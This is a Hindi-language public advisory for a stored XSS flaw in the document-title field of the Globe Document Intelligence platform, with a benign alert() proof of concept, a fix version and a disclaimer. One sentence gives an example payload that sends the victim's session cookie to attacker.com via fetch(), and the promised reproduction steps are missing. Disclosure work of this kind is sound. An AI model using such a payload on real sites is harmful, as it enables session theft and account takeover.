
CVE-2025-65640 के लिए सार्वजनिक सलाह: Globe Document Intelligence में संग्रहीत XSS भेद्यता।
ग्लोब डॉक्यूमेंट इंटेलिजेंस प्लेटफॉर्म (संस्करण 5.0.0.559) में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता की पहचान की गई। एप्लिकेशन नवनिर्मित दस्तावेज़ के "शीर्षक" गुण के भीतर उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को ठीक से स्वच्छ या एन्कोड करने में विफल रहता है। जब कोई प्रमाणित उपयोगकर्ता सारांश पृष्ठों (जैसे, "कार्य प्रगति पर / हाल ही") पर जाता है, तो दुर्भावनापूर्ण पेलोड पीड़ित के ब्राउज़र के संदर्भ में परावर्तित और निष्पादित होता है।
यह भेद्यता एक प्रमाणित हमलावर को सर्वर पर दुर्भावनापूर्ण जावास्क्रिप्ट कोड संग्रहीत करने की अनुमति देती है। जब अन्य प्रमाणित उपयोगकर्ता (प्रशासनिक खातों सहित) प्रभावित पृष्ठों को देखते हैं, तो स्क्रिप्ट स्वचालित रूप से निष्पादित होती है। जबकि नीचे दिया गया प्रूफ ऑफ कॉन्सेप्ट एक सौम्य alert() का उपयोग करके भेद्यता प्रदर्शित करता है, एक हमलावर इस दोष को सत्र अपहरण और खाता अधिग्रहण प्राप्त करने के लिए हथियार बना सकता है। उदाहरण के लिए, <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> जैसे पेलोड को इंजेक्ट करने से पीड़ित के सत्र कुकीज़ हमलावर द्वारा नियंत्रित बाहरी सर्वर पर चुपचाप बाहर निकल जाएंगी।
भेद्यता को पुन: उत्पन्न करने के लिए, एक प्रमाणित हमलावर इन चरणों का पालन कर सकता है:
<script>alert("XSS")</script>विक्रेता के अनुसार, यह भेद्यता संस्करण 5.1.0.575 में संबोधित की गई है। इस समस्या को ठीक करने के लिए, ग्लोब डॉक्यूमेंट इंटेलिजेंस प्लेटफॉर्म को संस्करण 5.1.0.575 में अपडेट करने की अनुशंसा की जाती है।
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) विशेष रूप से शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इस दस्तावेज़ में विस्तृत जानकारी और कोड का उपयोग दुर्भावनापूर्ण गतिविधियों या सिस्टम स्वामियों से स्पष्ट, पूर्व अनुमति के बिना किसी भी सिस्टम के विरुद्ध नहीं किया जाना चाहिए। लेखक किसी भी दायित्व को नहीं मानता है और प्रदान की गई सामग्री के अनुप्रयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।